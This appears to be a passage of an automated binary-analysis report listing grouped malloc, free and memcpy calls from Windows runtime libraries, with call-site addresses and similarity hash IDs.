                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7DFF2A), ref: 6C7EE04A
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7DFF2A), ref: 6C7EE0C0
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C7DFF2A), ref: 6C7EE0FE
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C7E6EAB
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C7E6EFA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C7E6F1E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7E6F5C
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C7A0A4D), ref: 6C7FB5EA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C7A0A4D), ref: 6C7FB623
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C7A0A4D), ref: 6C7FB66C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C7A0A4D), ref: 6C7FB67F
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C7CF611
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7CF623
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C7CF652
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7CF668
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1294909896-0